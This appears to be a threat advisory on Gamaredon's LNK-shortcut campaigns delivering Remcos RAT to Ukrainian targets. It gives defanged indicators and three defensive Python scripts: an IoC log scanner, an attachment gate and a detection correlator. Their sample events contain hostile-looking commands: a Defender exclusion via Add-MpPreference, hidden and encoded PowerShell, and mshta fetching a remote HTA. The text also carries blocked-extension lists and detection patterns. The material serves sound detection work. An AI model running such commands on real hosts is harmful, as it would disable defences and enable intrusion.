Gamaredon Revives Remcos RAT in Fileless LNK Shortcut Attacks

Threat Group: Gamaredon (a.k.a. Primitive Bear, UAC-0010/UAC-0184, Hive0156)
Threat Type: Remote Access Trojan (RAT)
Exploited Weaknesses: LNK shortcut execution, mshta.exe abuse, PowerShell scripting, DLL sideloading (abuse of legitimate Windows features rather than a software vulnerability with a CVE)
Malware Used: Remcos RAT v6.0.0 Pro
Threat Score: 🔴 High (7.5/10) – Due to fileless in-memory execution, sophisticated evasion, geofencing, and persistence techniques
Last Threat Observation: 31 July 2025


Overview

Beginning in late 2024 and continuing through July 2025, the Russian-aligned cyber espionage group Gamaredon has launched a sustained wave of phishing campaigns leveraging weaponised Windows .LNK shortcut files to deliver the commercial Remcos Remote Access Trojan (RAT). These campaigns have steadily evolved, incorporating new lures themed around Ukrainian military, governmental, and civil correspondence. Delivered via ZIP email attachments, these .LNK files serve as the primary vector to execute fileless payloads using trusted Windows utilities such as mshta.exe, obfuscated PowerShell loaders, and DLL sideloading with legitimate binaries.

Attribution links Gamaredon's activity directly to Russia's FSB Center 18. The most recent activity, tracked by IBM X-Force as Hive0156, reflects tactical refinements in delivery, stealth, and infrastructure obfuscation. The campaigns use geofenced command-and-control infrastructure, allowing Remcos to operate covertly while maintaining persistence.


Key Details

Delivery Method: ZIP archive containing .LNK shortcut files

Target: Ukrainian military, government, and administrative entities

Functions:

  • Fileless in-memory execution
  • VBScript via HTA launch
  • PowerShell shellcode reconstruction
  • Registry modification and persistence
  • DLL sideloading using signed binaries

Obfuscation: Use of mshta.exe, encoded PowerShell, in-memory execution, decoy documents, signed binary abuse


Attack Vectors

Gamaredon’s attack chain begins with ZIP attachments containing .LNK files named to resemble sensitive documents (e.g., troop movements, petitions, coordinates). Upon execution, the .LNK file launches mshta.exe, which downloads a remote HTA file. This HTA runs VBScript to:

  1. Execute obfuscated PowerShell (e.g., 24.ps1)
  2. Deploy a decoy PDF or spreadsheet document
  3. Modify registry values for persistence (HKCU\...\RunOnce)
  4. Exclude payload path from Defender scans

The PowerShell payload reconstructs shellcode in memory and injects Remcos into explorer.exe. In some variants a signed binary such as TiVoDiag.exe is used to sideload mindclient.dll, which decrypts and launches the Remcos payload. Remcos then connects to command-and-control servers hosted with providers such as GTHost and HyperHosting; the servers are geofenced so that only connections from Ukrainian IP addresses are accepted.


Known Indicators of Compromise (IoCs)

IPv4 Addresses

  • 198[.]23[.]251[.]10
  • 92[.]82[.]184[.]33

MD5 Hashes

  • 560682cdcf395b5eb95487c7ef65c63e
  • ae8066bd5a66ce22f6a91bd935d4eee6

SHA1 Hashes

  • d2f97077fcf7e340a4262fa944ab13f133aa4e58
  • e444d001f2b69259f7845a5ffe9a44113d90e382

SHA256 Hashes

  • 506ecb76cf8e39743ec06129d81873f0e4c1ebfe7a352fc5874d0fc60cc1d7c6
  • 5ec8268a5995a1fac3530acafe4a10eab73c08b03cabb5d76154a7d693085cc2
  • 8bc668fd08aecd53747de6ea83ccc439bdf21b6d9edf2acafd7df1a45837a4e1

URLs

  • hxxp://shipping-hr[.]ro/m/r/r[.]txt

Domains

  • mal289re1[.]es
  • shipping-hr[.]ro
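
The indicators above are published defanged ("[.]", "hxxp") and have to be refanged before they can be compared with proxy, DNS or EDR records. The script below is an added example, not part of the advisory or of any vendor tooling: it refangs the advisory's own IoCs, compiles bounded patterns so that look-alike hosts (for example not-shipping-hr.ro) do not produce false positives, and runs them over a handful of constructed log lines in an assumed key=value format.

```python
import re

# Indicators exactly as published in the advisory above, in defanged form.
DEFANGED_IOCS = {
    "ipv4": ["198[.]23[.]251[.]10", "92[.]82[.]184[.]33"],
    "domain": ["mal289re1[.]es", "shipping-hr[.]ro"],
    "url": ["hxxp://shipping-hr[.]ro/m/r/r[.]txt"],
    "sha256": [
        "506ecb76cf8e39743ec06129d81873f0e4c1ebfe7a352fc5874d0fc60cc1d7c6",
        "5ec8268a5995a1fac3530acafe4a10eab73c08b03cabb5d76154a7d693085cc2",
        "8bc668fd08aecd53747de6ea83ccc439bdf21b6d9edf2acafd7df1a45837a4e1",
    ],
}

# Constructed sample log lines (proxy, DNS and EDR records in an assumed key=value format).
# Line 1 fetches the published URL, line 2 resolves a published domain to a published IP,
# line 4 records a file whose SHA256 is published; lines 3 and 5 are benign look-alikes.
SAMPLE_LOG = [
    '2025-07-31T09:14:02Z proxy src=10.0.5.21 method=GET url="http://shipping-hr.ro/m/r/r.txt" status=200',
    '2025-07-31T09:14:05Z dns client=10.0.5.21 query=mal289re1.es type=A answer=198.23.251.10',
    '2025-07-31T09:15:10Z proxy src=10.0.5.22 method=GET url="https://www.example.com/" status=200',
    '2025-07-31T09:16:44Z edr host=WS-021 event=file_create path=C:\\Users\\u\\AppData\\Local\\Temp\\24.ps1 '
    'sha256=8bc668fd08aecd53747de6ea83ccc439bdf21b6d9edf2acafd7df1a45837a4e1',
    '2025-07-31T09:17:00Z dns client=10.0.5.23 query=not-shipping-hr.ro type=A answer=203.0.113.9',
]


def refang(ioc: str) -> str:
    """Convert a defanged indicator ("[.]", "hxxp") back to the live form seen in logs."""
    live = ioc.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    return re.sub(r"^hxxp(s?)://", r"http\1://", live, flags=re.IGNORECASE)


def build_matchers(defanged: dict) -> list:
    """Compile one bounded regex per indicator.

    Hosts and IPs are bounded so that 92.82.184.33 does not fire on 192.82.184.33 and
    shipping-hr.ro does not fire on not-shipping-hr.ro, while a subdomain such as
    x.shipping-hr.ro still matches because "." is permitted before the indicator.
    """
    matchers = []
    for kind, values in defanged.items():
        for value in values:
            live = refang(value)
            if kind in ("ipv4", "domain"):
                pattern = r"(?<![\w-])" + re.escape(live) + r"(?![\w-])"
            elif kind == "sha256":
                pattern = r"\b" + re.escape(live) + r"\b"
            else:  # full URL: exact substring match
                pattern = re.escape(live)
            matchers.append((kind, live, re.compile(pattern, re.IGNORECASE)))
    return matchers


def scan_lines(lines, matchers):
    """Return (line_number, kind, live_indicator) for every indicator found in each line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for kind, live, pattern in matchers:
            if pattern.search(line):
                hits.append((number, kind, live))
    return hits


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG, build_matchers(DEFANGED_IOCS)):
        print(hit)
```

Run against the constructed lines it reports five hits on lines 1, 2 and 4 and nothing on the benign lines; in production the same matchers can be applied to a streamed log rather than the in-memory list.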

Mitigation and Prevention

User Awareness: Train users to recognise and report suspicious .LNK files and ZIP attachments. Emphasise vigilance against social engineering techniques and decoy document lures.

Email Filtering: Block .LNK, .HTA, and executable files in email attachments. Use sandboxing to analyse embedded scripts and archive contents.
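
Blocking by extension alone misses a shortcut renamed to .pdf, so an attachment gate should look at content as well as names. The following is an added example written for this advisory, not code from any vendor or from the sources listed below: it opens a ZIP attachment in memory, flags members by blocked extension, flags any member whose bytes begin with the Windows shortcut header (HeaderSize 0x4C followed by the MS-SHLLINK LinkCLSID) regardless of its name, descends into nested archives, and refuses to inflate oversized members. The test archive it builds is constructed; its "shortcuts" are just the header plus zero padding, not working .LNK files.

```python
import io
import os
import zipfile

# Extensions the advisory recommends blocking at the mail gateway, plus common script types.
BLOCKED_EXTENSIONS = {".lnk", ".hta", ".exe", ".dll", ".scr", ".js", ".jse", ".vbs", ".vbe",
                      ".ps1", ".cmd", ".bat", ".wsf", ".com", ".pif"}

# Shortcut files begin with HeaderSize 0x0000004C followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046 serialised little-endian (MS-SHLLINK).
LNK_MAGIC = (b"\x4c\x00\x00\x00"
             b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")

MAX_NESTING = 2                       # levels of zip-in-zip to open
MAX_MEMBER_BYTES = 20 * 1024 * 1024   # never inflate more than this per member (zip-bomb guard)


def classify_member(name: str, data: bytes) -> list:
    """Reasons to block one archive member, judged by its name and its leading bytes."""
    reasons = []
    ext = os.path.splitext(name.strip().lower())[1]
    if ext in BLOCKED_EXTENSIONS:
        reasons.append(f"blocked extension {ext}")
    if data.startswith(LNK_MAGIC) and ext != ".lnk":
        reasons.append("LNK header under a non-.lnk name")
    return reasons


def inspect_zip(blob: bytes, depth: int = 0) -> list:
    """Walk a ZIP (and nested ZIPs up to MAX_NESTING) and collect (member, reason) findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            if info.file_size > MAX_MEMBER_BYTES:
                findings.append((info.filename, "member too large to inspect"))
                continue
            data = archive.read(info.filename)
            for reason in classify_member(info.filename, data):
                findings.append((info.filename, reason))
            if depth < MAX_NESTING and zipfile.is_zipfile(io.BytesIO(data)):
                for inner, reason in inspect_zip(data, depth + 1):
                    findings.append((f"{info.filename}/{inner}", reason))
    return findings


def should_quarantine(blob: bytes) -> bool:
    """Gate decision: any finding at all quarantines the attachment."""
    return bool(inspect_zip(blob))


def build_sample_attachment() -> bytes:
    """Constructed test archive: a .lnk, a benign text file, a shortcut renamed to .pdf,
    and a nested zip holding an .hta. Shortcut bodies are header plus padding only."""
    fake_lnk = LNK_MAGIC + b"\x00" * 56
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("run.hta", "<html><!-- constructed placeholder --></html>")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Petition_2025.pdf.lnk", fake_lnk)
        z.writestr("coordinates.txt", "benign text")
        z.writestr("notes.pdf", fake_lnk)
        z.writestr("inner.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for member, reason in inspect_zip(build_sample_attachment()):
        print(f"{member}: {reason}")
```

On the constructed archive it reports the .lnk by extension, the renamed shortcut by header, and the .hta inside the nested archive, while the plain text file passes.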

Antivirus Protection: Ensure AV engines can inspect in-memory PowerShell execution. Block abuse of mshta.exe and monitor use of legitimate binaries for DLL sideloading.

Two-Factor Authentication (2FA): Enforce 2FA to limit the impact of credential theft in case of compromise.

Monitor Logs: Monitor Windows Event Logs for anomalous use of mshta.exe, registry modifications under Run/RunOnce, and unusual parent-child process relationships.
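
The chain described under Attack Vectors (explorer.exe launching mshta.exe with a URL, PowerShell spawned from mshta.exe, a RunOnce write, a Defender exclusion, a signed binary sideloading a DLL) maps onto a small set of host-level rules, and the value comes from correlating them per host rather than alerting on any one. The code below is an added example for this advisory, not detection content from the sources listed at the end: the events are constructed dictionaries whose field names loosely follow Sysmon (Image, ParentImage, CommandLine, TargetObject, ImageLoaded, Signed), the EventType values and the host-name and SID values are assumptions, and the lure URL is a placeholder. The sideload rule keys on an unsigned DLL loaded from the same user-writable directory as its host process and does not verify the host binary's signature, which a real pipeline would add from its own enrichment.

```python
import re
from collections import defaultdict

# Rule names with a description and the ATT&CK technique each corresponds to.
RULES = {
    "mshta_remote_url": "mshta.exe started with an http(s) URL argument (T1218.005)",
    "powershell_from_mshta": "PowerShell spawned by mshta.exe (T1059.001)",
    "encoded_powershell": "PowerShell invoked with -EncodedCommand or an abbreviation (T1027)",
    "defender_exclusion": "Defender exclusion via Add-MpPreference or the Exclusions registry key (T1562.001)",
    "run_key_persistence": "value written under CurrentVersion\\Run or RunOnce (T1547.001)",
    "dll_sideload": "unsigned DLL loaded from the same user-writable directory as its host exe (T1574.002)",
}

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# -e, -ec, -enc and -encodedcommand are all accepted by powershell.exe; -ep / -ExecutionPolicy are not matched.
ENCODED_PS_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?(?=\s|$)", re.IGNORECASE)
DEFENDER_EXCL_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath|\\Windows Defender\\Exclusions\\", re.IGNORECASE)
RUNKEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"^C:\\Users\\|^C:\\ProgramData\\|\\Temp\\", re.IGNORECASE)


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _dir(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def evaluate(event: dict) -> list:
    """Return the names of all rules a single event triggers, in rule order."""
    hits = []
    kind = event["EventType"]
    if kind == "ProcessCreate":
        image, parent = _base(event["Image"]), _base(event["ParentImage"])
        cmd = event.get("CommandLine", "")
        is_ps = image in ("powershell.exe", "pwsh.exe")
        if image == "mshta.exe" and URL_RE.search(cmd):
            hits.append("mshta_remote_url")
        if is_ps and parent == "mshta.exe":
            hits.append("powershell_from_mshta")
        if is_ps and ENCODED_PS_RE.search(cmd):
            hits.append("encoded_powershell")
        if DEFENDER_EXCL_RE.search(cmd):
            hits.append("defender_exclusion")
    elif kind == "RegistryValueSet":
        target = event["TargetObject"]
        if RUNKEY_RE.search(target):
            hits.append("run_key_persistence")
        if DEFENDER_EXCL_RE.search(target):
            hits.append("defender_exclusion")
    elif kind == "ImageLoad":
        loaded = event["ImageLoaded"]
        if (event.get("Signed", "true").lower() == "false"
                and USER_WRITABLE_RE.search(loaded)
                and _dir(loaded) == _dir(event["Image"])):
            hits.append("dll_sideload")
    return hits


def correlate(events, threshold: int = 3):
    """Group distinct rule hits per host; hosts reaching `threshold` distinct rules are escalated."""
    per_host = defaultdict(set)
    for event in events:
        for rule in evaluate(event):
            per_host[event["Host"]].add(rule)
    summary = {host: sorted(rules) for host, rules in per_host.items()}
    escalate = sorted(host for host, rules in per_host.items() if len(rules) >= threshold)
    return summary, escalate


# Constructed events: WS-021 reproduces the chain from the advisory, WS-022 is benign activity.
SAMPLE_EVENTS = [
    {"Host": "WS-021", "EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://lure.example.invalid/r.hta"},
    {"Host": "WS-021", "EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"powershell.exe -w hidden -ep bypass -File C:\Users\u\AppData\Local\Temp\24.ps1"},
    {"Host": "WS-021", "EventType": "RegistryValueSet",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Updater"},
    {"Host": "WS-021", "EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -nop -enc QQBCAEMA"},
    {"Host": "WS-021", "EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Add-MpPreference -ExclusionPath C:\Users\u\AppData\Local\Temp"},
    {"Host": "WS-021", "EventType": "ImageLoad", "Image": r"C:\Users\u\AppData\Roaming\TiVo\TiVoDiag.exe",
     "ImageLoaded": r"C:\Users\u\AppData\Roaming\TiVo\mindclient.dll", "Signed": "false"},
    {"Host": "WS-022", "EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\help.hta"},
    {"Host": "WS-022", "EventType": "ImageLoad", "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\ntdll.dll", "Signed": "true"},
]

if __name__ == "__main__":
    summary, escalate = correlate(SAMPLE_EVENTS)
    for host, rules in summary.items():
        print(host, [RULES[r] for r in rules])
    print("escalate:", escalate)
```

On the constructed events every rule fires once for WS-021 and it is escalated, while WS-022's local mshta.exe use and signed system DLL load produce nothing; the threshold of three distinct rules is a starting point to tune against the environment's own baseline.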

Regular Updates: Ensure OS and endpoint security tools are up to date. Apply application control policies where feasible.


Risk Assessment

Gamaredon’s use of social engineering, trusted system binaries, fileless payloads, and geofenced C2 infrastructure presents a high risk to targeted environments. The sophistication of this campaign and the use of Remcos RAT (capable of keylogging, browser data theft, and remote surveillance) make this threat a priority concern for organisations in or supporting Ukraine.

Threat Score: 🔴 High (7.5/10)


Conclusion

Gamaredon’s Remcos campaigns continue to demonstrate the group’s persistent evolution and operational focus on Ukrainian targets. By leveraging .LNK files for fileless malware delivery, DLL sideloading, and command-and-control techniques tailored for stealth and persistence, Hive0156 poses a serious threat to national infrastructure and government assets.

Organisations must adopt layered defences with strong endpoint detection, email controls, script execution restrictions, and user training. Continuous intelligence monitoring is essential to detect and block the latest variations of this campaign.


Sources:

Cisco Talos – Gamaredon LNK to Remcos campaign – https://blog.talosintelligence.com/gamaredon-campaign-distribute-remcos/
IBM X-Force – Hive0156 targeting Ukraine – https://www.ibm.com/think/x-force/hive0156-continues-remcos-campaigns-against-ukraine
Qualys TRU – PowerShell-based Remcos delivery – https://blog.qualys.com/vulnerabilities-threat-research/2025/05/15/fileless-execution-powershell-based-shellcode-loader-executes-remcos-rat
AlienVault OTX – Indicators of Compromise – https://otx.alienvault.com/pulse/688a324d62b64db244b9463f